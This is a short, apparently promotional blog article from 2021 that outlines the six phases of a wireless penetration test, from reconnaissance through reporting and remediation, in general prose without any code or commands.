Wednesday, 28 July 2021 14:33

Phases of a Wireless Penetration Test

Wireless penetration tests are more complicated than just "hacking" into a network to see vulnerabilities. There is a step-by-step process that penetration testers go through to ensure they covered every corner of a company's network vulnerabilities. This article will cover what those stages are in the process and take a deeper look into all of the phases listed. To understand what a wireless penetration test is, check out our other article Wireless Penetration Testing: What You Need to Know.


Phase 1: Reconnaissance


This first phase involves gathering as much data as possible. Focusing on gathering information on and about what networks correlate with the business. The penetration tester scouts the physical business headquarters to probe for:


  • All wireless networks related to the business
  • Wireless networks that business devices connect to
  • Any wireless networks that personal devices connect to
  • Other wireless networks in proximity that can connect to it


Probing for these networks is not about getting in-depth intelligence but more about getting broad coverage and compiling an outline of their data. The majority of the information gathered can be helpful but will be encrypted due to many businesses using the latest Wi-Fi protocol: WPA2. The protocol protects the access point through encryption and EAPOL authentication.

The focus of this phase is to set up for the following stages. 


Phase 2: Identifying Networks


After collecting the broad list of wireless networks managed in the reconnaissance phase, it is time to scan them in-depth. 


After collecting a broad list of networks, it is time to identify and produce detailed data that separates each network from one another. The penetration tester begins to develop portfolios for each network determined. Distinct characteristics are obtained and used to organize them; some traits include:

  • Names of individual networks and the correspondent devices connected
  • Average traffic and usage patterns of separate networks and devices
  • Channels, ports, and divisions within each network


This stage's collected data is vital in the following phase in identifying vulnerabilities on the access points. 


Phase 3: Vulnerability Research


The next phase of the pen-test focuses on zoning out weaknesses on access points. This phase is the final and most crucial planning step in the process. 


Even more detailed analysis is conducted on the wireless networks, seeking any exploitable faults. One weak link can be the one that compromises the entire network and results in complete control of the system. The most common vulnerabilities are:


  • Piggybacking
  • Wardriving
  • Evil Twin Attacks
  • Wireless Sniffing
  • Unauthorized Computer Access
  • Shoulder Surfing
  • Theft of Mobile Devices


For example, An encrypted key is an exchange between a Wi-Fi access point (AP) and an authenticated client. A process known as a '4-way handshake', when the user tries to establish to the AP, a pre-shared key is generated and transmitted.

A malicious hacker can sniff out the key during the vital transmission and forcibly shut it offline, and attempt to extract the password. 

The following stage will clarify how these vulnerabilities become exploitable.


Phase 4: Exploitation


We are now bringing the planning phases into an action phase. 


This stage is where an actual attack develops into a plan. First, ethical hacking is in use with the intent of obtaining control of the client's cyber assets. Second, this stage is when the penetration tester attempts to breach the system as fast as possible, diving as far into the system and exiting, all without being caught. 


Typically this stage consists of a combination of the following:


  • The exploitation of a vulnerability in a wireless connection in an attempt to infiltrate the system
  • Doubling back and testing laterally for subsequent ways to breach
  • Following a path to its extent, in an attempt to seize any control
  • Exposing the following courses for future exploitations


After exploring all possible exploitations or achieving a limit identified in the scope negotiation, the process is complete. 


Phase 5: Reporting


Compiling all the previous steps and their findings into an in-depth report is key to completing a penetration test. Although it is primarily straightforward, it is essential in how it is executing. The following section should be in the final report:


  • Executive Summary
  • Detailed Technical Risks
  • Vulnerabilities Found
  • How you Found the Vulnerabilities
  • Successful Exploits
  • Mitigation Recommendations


After organizing all the data gathered, then the final phase can initiate.


Phase 6: Security Control Application


The client must receive a way to protect itself from the identified vulnerabilities. Furthermore, the attacker must end the test by changing the offense into a defensive plan for the client. 


All successful exploitations and vulnerabilities identified become reasons for a mitigation plan that the attacking party will develop on behalf of the client. The plan should include:

  • Cybersecurity processes that patch existing gaps in the security 
  • Techniques that add more layers of defense
  • Have solutions that cover both short and long-term fixes



We discussed the six phases of a wireless pen test and the importance of each step in the journey. It was also highlighted in the first diagram how only the last two stages are what is seen by the company after the test is complete. The previous two stages are essential in bringing to light the company's network weaknesses and developing an action plan to mitigate future real-time risks. 



Last modified on Wednesday, 04 August 2021 20:24